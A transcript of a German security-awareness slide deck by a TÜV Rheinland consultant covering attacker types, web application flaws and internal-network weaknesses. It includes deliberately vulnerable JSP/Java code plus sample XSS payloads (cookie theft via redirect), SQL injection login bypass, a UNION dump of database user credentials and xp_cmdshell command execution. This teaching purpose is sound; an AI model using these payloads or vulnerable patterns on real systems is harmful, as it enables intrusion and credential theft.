IT-Risiken Erkennen, vorausschauend und angemessen Handeln

Transkript

1 IT-Risiken Erkennen, vorausschauend und angemessen Handeln Philippe A. R. Schaeffer Senior Security Consultant TÜV Rheinland Secure it GmbH

2 Wegbegleiter TÜV Rheinland Secure it Wer wir sind. Tochtergesellschaft der TÜV Rheinland Group TÜV RG weltweit vertreten an 300 Standorten in 50 Ländern Secure it: internationale Spezialisten zur dauerhaften Sicherung von IT-Umgebungen: Analysieren Optimieren Zertifizieren Konzentration auf die Bereiche IT- Security IT-Prozesse IT-Services 2/ 40

3 Portfolio-Übersicht IT-Security: IT-Security Management IT-Security Testing IT-Security Zertifizierung Datenschutz IT-Prozesse: IT-Service Management Software-Entwicklung und -Beschaffung IT-Usability 3/ 40

4 Agenda I. Kurze Einführung / Begriffserklärung II. Viel versprechende Ziele: Web-Applikationen III. Sicherheitsrisiken in internen Netzen 4/ 40

5 Was ist ein Angriff (sicherheitsrelevanter Vorfall)? Willentliche oder unwissentliche Aktion, von extern oder intern durchgeführt, die die Verfügbarkeit, Vertraulichkeit, Integrität oder Authentizität der IT-Infrastruktur oder der Daten gefährdet. Hackerangriff (extern oder intern), Virenbefall, etc. Fehlbedienung durch Administratoren oder Benutzern Missbrauch von IT-Systemen 5/ 40

6 Kurze Begriffsklärung Hacker, Cracker, Script Kiddies, Blackhats??? Ursprünglich bezeichneten sich technisch versierte Querdenker selbst als Hacker Heute werden gemeinhin Leute als Hacker bezeichnet, die nach Zugriffswegen in Computer und Netzwerke suchen Im Allgemeinen bestehen keine kriminellen Absichten Ziel ist es vielmehr neue Zugriffswege zu entdecken und besser zu sein als die eingesetzten Schutzmechanismen In zunehmendem Maße besteht heute kommerzielles Interesse an Hacker-Diensten 6/ 40

7 Potentielle Angreifer Script Kiddies (viele Angreifer ohne tiefes Know-How, aber mit mächtigen Waffen) Hacker, Cracker Experten mit unterschiedlichen Motiven Professionelle Dienste, Industriespionage Automatische Systeme Würmer, Viren, Spy-Ware Mitarbeiter aus Unzufriedenheit, Langeweile, DAU 7/ 40

8 Bedrohung für die IT Infrastruktur Wireless LAN, Bluetooth, Internet Partnernetze (Zulieferer, Dienstleister, Service) IT TK-Anlage (Modem, ISDN, Wartungszugänge) Interne oder externe MA (intern) RAS, VPN, Laptops 8/ 40

9 Allgemeine Vorgehensweise Informationen gewinnen über eingesetzte Netzwerke und Zugänge Hardware Software Dienste Konfiguration Recherche Vorhandene Schwachstellen identifizierter Komponenten Existierende Exploits Gezielte Penetration Zeit ein Angreifer hat meist viel Zeit 9/ 40

10 Agenda I. Kurze Einführung / Begriffserklärung II. Viel versprechende Ziele: Web-Applikationen III. Sicherheitsrisiken in internen Netzen 10 / 40

11 Wege der Bedrohung Wireless LAN, Bluetooth, Internet Partnernetze (Zulieferer, Dienstleister, Service) IT ITK-Anlage (Modem, ISDN, Wartungszugänge) Interne MA oder externe MA (intern) RAS/VPN/ Laptops 11 / 40

12 Vielversprechende Ziele: Web Applikationen Die Anzahl (interaktiver) Web Applikationen steigt ständig Web Applikationen greifen häufig auf Backend Systeme zu Die Applikation wurde individuell entwickelt oder angepasst Sie wurde nicht ausreichend getestet Verschiedene Abteilungen sind beteiligt / verantwortlich Keine klaren Verantwortungen Auf Web Applikationen soll aus dem Internet zugegriffen werden Angriffe sind anspruchsvoller und somit auch interessanter für Hacker 12 / 40

13 Bedrohungen für die IT Infrastructure durch Web Applikationen Firewall Security Web Server Application Server Database 13 / 40

14 Die häufigsten Fehler in Web Applikationen Interne Informationen, Dateien oder Source Code kann eingesehen werden Die eingesetzte Software (Apache, PHP, SSL, etc.) befindet sich nicht auf aktuellem Stand Die Systeme werden nicht oder unzureichend überwacht Benutzereingaben werden nicht hinreichend validiert Direkte Command Injection Cross Site Scripting SQL Injection Die Systeme haben Zugriff auf interne Netzwerke 14 / 40

15 Erster Schritt: Fehlermeldungen 15 / 40

16 Erster Schritt: Fehlermeldungen Detaillierte Fehlermeldungen werden nur für die Entwicklung (Debugging) benötigt. Auf Produktivsystemen führen Fehlermeldungen den Angreifer zu der Sicherheitslücke des Systems. Eine Standard-Fehlermeldung verdirbt den Spaß an der Suche nach Sicherheitslücken. Detaillierte Fehlermeldungen können (und sollten) dennoch in den internen Logs gesammelt werden. 16 / 40

17 Nächster Schritt: An allen Schrauben drehen 17 / 40

18 Die Resultate anhand von Fehlermeldungen analysieren 18 / 40

19 Cross Site Scripting (XSS) 19 / 40

20 XSS - Erklärung Möglich, wenn Web-Seiten Benutzereingaben ohne Prüfung oder Filterung wiedergeben Angegriffen wird der Client (Browser) des Benutzers, nicht der Web-Server -> meistens ist die Interaktion des Benutzers notwendig Aber: Der Benutzer hat keine Chance zu erkennen, dass die ihm präsentierte Web-Seite nicht die tatsächliche (vertrauenswürdige) Web-Seite des Anbieters ist Korrekte URL Korrekte SSL Zertifikate 20 / 40

21 XSS - Beispiel einer JSP Seite <%@ page contenttype="text/html; charset=iso " language="java" errorpage="" %> [...] <% String query = request.getparameter( query"); %> <p> Die Suche nach <b> <%=query%> </b> lieferte folgende Ergebnisse: <p> [...] 21 / 40

22 XSS - Korrekte Eingabe Folgende Suchanfrage wurde eingegeben: Sonderangebote Daraus ergibt sich die HTML Seite: <p> Die Suche nach <b> Sonderangebote </b> lieferte folgende Ergebnisse: <p> Dies wird angezeigt als: Die Suche nach Sonderangebote lieferte folgende Ergebnisse: 22 / 40

23 XSS - Hacker Eingabe Folgende Suchanfrage wurde eingegeben: <script>alert(1)</script> Daraus ergibt sich die HTML Seite: <p> Die Suche nach <b> <script>alert(1)</script> </b> lieferte folgende Ergebnisse: <p> Dies wird angezeigt als: 23 / 40

24 XSS - Weitere Auswirkungen Umleiten auf andere Web-Seiten <script>document.location.href= </script> Zugriff auf Cookies oder SessionIDs eines Benutzers <script>document.location.href= + document.url + document.cookie</script> Ändern der Seiten-Inhalte z.b. Ersetzen der Passwort-Abfrage Einfügen von Viren/Trojanern 24 / 40

25 SQL Injection 25 / 40

26 SQL Injection - Beispiel einer ASP Seite Package myseverlets; [...] String sql = new String( SELECT * FROM WebUsers WHERE Username= + request.getparameter( username ) + AND Password= + request.getparameter( password ) + stmt = Conn.prepareStatement(sql) Rs = stmt.executequery() [...] 26 / 40

27 SQL Injection - Korrekte Eingabe Benutzername und Passwort lauten wie folgt: Bob Hardtoguess Daraus ergibt sich der SQL Ausdruck: SELECT * FROM WebUsers WHERE Username= Bob AND Password= Hardtoguess 27 / 40

28 SQL Injection - Hacker Eingabe Als Passwort wird eingegeben: Aa OR A = A Somit ergibt sich der SQL Ausdruck.: SELECT * FROM WebUsers WHERE Username= Bob AND Password= Aa OR A = A Dieser Ausdruck wird immer als TRUE evaluiert => Der Angreifer wird erfolgreich authentifiziert 28 / 40

29 SQL Injection - Weitere Auswirkungen Zugriff auf andere Tabellen SELECT * FROM PRODUCT WHERE ProductName= test UNION select username, password from dba_users where a = a Löschen oder Ändern von Daten Ausführen von Befehlen SELECT * FROM PRODUCT WHERE ProductName= test UNION SELECT exec master.dbo.xp_cmdshell dir c:\ Zugriff auf das interne Netzwerk 29 / 40

30 Empfehlungen Jedes System muss sich selbst schützen können Sicherheitstest bei Entwicklung, Test und Produktion Härtung des Betriebssystems Nur benötigte Dienste Lokale Berechtigungen Härtung der Serversoftware Konfiguration der Serverdienste Nur benötigte Funktionen Härtung der Applikationen Input Validation!!! Patch Management 30 / 40

31 Schlußfolgerung Web Applikationen sind dankbare Ziele Die Entwickler denken im Kontext der abzubildenden Geschäftsprozesse... Hacker denken anders! Eine vielzahl möglicher Angriffsvektoren HTML oder SQL Injection Cookie Diebstahl Cross Site Scripting (XSS) Ändern interner Parameter etc. 31 / 40

32 Agenda I. Kurze Einführung / Begriffserklärung II. Viel versprechende Ziele: Web-Applikationen III. Sicherheitsrisiken in internen Netzen 32 / 40

33 Wege der Bedrohung Wireless LAN, Bluetooth, Internet Partnernetze (Zulieferer, Dienstleister, Service) IT ITK-Anlage (Modem, ISDN, Wartungszugänge) Interne MA oder externe MA (intern) RAS/VPN/ Laptops 33 / 40

34 Hacking in internen Netzwerken Wer? Interner Mitarbeiter mit persönlichen Interessen. Externer Mitarbeiter mit loser Bindung zum Unternehmen. Externer Angreifer mit Hilfe eines Trojaners oder ähnlichem Tunnel. Erfolgsaussichten... nur eine Frage der Zeit (gerechnet in Minuten)... Vorgehensweise Herstellen eines "Rückkanals" Suchen nach interessanten Systemen Suchen nach "verletzbaren" Systemen Suchen nach Passwörtern Mitlesen des internen Netzwerk-Verkehrs 34 / 40

35 Hitparade der häufigsten Fehler 1. Schlechte Passwörter Leere oder Standard-Passwörter, Passwort=Benutzername, Veraltete Software Versionen Betriebssysteme, Anwendungen und Dienste, Module, Fehlerhafte oder nicht-existente Absicherung von Softwarekomponenten Test- oder Standard-Skripte, Admin-Frontends in Netzwerkkomponenten, nicht benötigte Dienste, Nachlässigkeit in der Administration Unklare Verantwortlichkeiten, liegengebliebene Backup-Dateien, Unzureichende Trennung von Systemen unterschiedlichen Schutzbedarfs Zugriff aus der Lobby auf die Server, gleiche Admin-Passwörter auf unterschiedlich wichtigen Systemen, / 40

36 Hitparade der häufigsten Fehler 6. Vertrauen auf die Sicherheit vorgelagerter Systeme (implizite Sicherheit) Firewalls, keine Security License Agreements (SecLAs) mit Dienstleistern oder Providern 7. Nebenzugänge TK-Anlage, RAS- oder Wartungszugänge, Servicedienstleister, Neue Technologien werden blind eingesetzt WLAN, Bluetooth, VoIP Informationspreisgabe Header, HTTP Header, Google, Newsgroups, Nachlässigkeit bei der Umsetzung interner Sicherheit Vertrauen auf Border Security 36 / 40

37 Beispiel für die Vorgehensweise im internen Netz (1/2) Suche nach möglichen Wegen nach Außen, z.b.: Proxy-Server, Mail-Server, DNS-Server Telefonanschlüsse, SMS-Gateways Identifizieren von erreichbaren Netzwerken und Systemen (z.b. auch Leittechnik-Netzwerke) Welche Verbindungen sind erlaubt Welche Dienste/Anwendungen sind darüber erreichbar => Web-Applikationen Abfrage von erreichbaren Informationen, z.b. Eingesetzte Software-Versionen (OS und Anwendungen) DNS (insbesondere Active Directory) NULL-Session, SNMP 37 / 40

38 Beispiel für die Vorgehensweise im internen Netz (2/2) Suche nach veralteter/ungepatchter Software Vergessene Systeme, nicht benötigte Anwendungen Von Drittanbietern betreute Systeme (Gewährleistung!) Suche nach schwachen Passwörtern und ungeschützten Systemen Passwörter, die nicht von einer Policy erfasst werden Standard-Passwörter, übliche Passwörter Unverschlüsselter Netzwerkverkehr Suche nach weiteren Informationen auf kompromittierten Systemen Backup-Dateien, System-Skripte Passwörter Entschlüsseln / Brute Forcing von Passwörtern 38 / 40

39 Empfehlungen Netzwerksegmentierung Gemäß Schutzbedarfs und Vertrauensstellung der Systeme Nur tatsächlich benötigte Kommunikation zulassen Prinzip der multiplen Verteidigungslinien Etablierung von IT-Sicherheitsprozessen Härtung der Systeme Patchmanagement Überwachung (ggf. durch Dritte) Schulung der Anwender und Administratoren Security Engineering (in der Entwicklung) Bessere Passwörter! 39 / 40

40 Schritt für Schritt an die Spitze Wir unterstützen Sie dabei. Vielen Dank für Ihre Aufmerksamkeit. Haben Sie Fragen? Philippe A. R. Schaeffer TÜV Rheinland Secure it Tel.: / 40